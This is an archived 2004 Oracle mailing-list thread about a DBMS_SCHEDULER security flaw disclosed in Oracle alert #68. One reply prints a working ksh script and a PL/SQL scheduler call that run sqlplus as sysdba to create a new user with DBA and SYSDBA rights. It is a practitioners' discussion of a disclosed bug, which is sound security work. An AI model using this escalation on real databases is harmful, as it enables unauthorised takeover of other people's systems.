What annoys me the most is that the bug is so trivial
that it should have been discovered during the beta test.
You and Pete didn't specify how exactly is it possible, probably
out of the goodness of your heart, so I did a little investigation
of my own, and discovered that Oracle10g alows shell scripts to
be scheduled using DBMS_SCHEDULER. Of course, DBMS_SCHEDULER still
uses job queue processes owned by user oracle to schedule those
shell scripts. The thing that can be done is to schedule a shell
script containing the following sequence:
#!/bin/ksh
set -a
echo "Operator, are you pondering what I am pondering?">/dev/console
ORAENV_ASK=NO
ORACLE_SID=<sid>
. /usr/local/bin/oraenv
sqlplus "/ as sysdba"<<EOF
create user brain identified by takeover
default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF

If this script is executed by a process owned by user "oracle",
"connect / as sysdba" will succeed. The database is mine.

All you need to do is it to run something like this:

BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
 program_name       => 'take_over_the_world',
 program_action      => '/tmp/pinky_and_the_brain',
 program_type       => 'EXECUTABLE',
 comments          => 'I rulez');
END;
/

and you are ready to create the job and run it. I was astonished
how simple and trivial the flaw is. Someone should have thought of
that during beta testing. Now, let me put on a wide smile and ask:
is that the bug that you and Pete have found?

--
Mladen Gogala
Oracle DBA
email:mladeng@(protected)
Ext: 9787


> -----Original Message-----
> From: Jonathan Gennick [mailto:jonathan@(protected)]
> Sent: Thursday, September 02, 2004 8:33 AM
> To: Pete Finnigan
> Cc: oracle-l@(protected)
> Subject: Re: PeteFinnigan.com Oracle advisory for bugs in
> dbms_scheduler (alert #68)
>
>
> This alert apparently covers several flaws. I'm actually
> taken-aback by how long it's taken Oracle to respond to the
> one Pete and I uncovered back in March, which let's you
> leverage the new scheduler to gain access to the Oracle user,
> and thence to grant yourself DBA privileges.
>
> Best regards,
>
> Jonathan Gennick --- Brighten the corner where you are
http://Gennick.com * 906.387.1698 * mailto:jonathan@(protected)

Join the Oracle-article list and receive one
article on Oracle technologies per month by
email. To join, visit
http://five.pairlist.net/mailman/listinfo/oracle-article,
or send email to Oracle-article-request@(protected)
include the word "subscribe" in either the subject or body.


Wednesday, September 1, 2004, 3:06:15 PM, Pete Finnigan
(oracle_list@(protected):
PF> Hi everyone,

PF> Oracle released last night alert #68 covering fixes for many
PF> security bugs in Oracle. PeteFinnigan.com found security bugs in the
PF> new 10gR1 scheduler functionality. Our security advisory can be
PF> found at http://www.petefinnigan.com/alerts.htm

PF> Kind regards

PF> Pete

---
To unsubscribe - mailto:oracle-l-request@(protected)
To read recent messages - http://freelists.org/archives/oracle-l/09-2004
---
To unsubscribe - mailto:oracle-l-request@(protected)
To read recent messages - http://freelists.org/archives/oracle-l/09-2004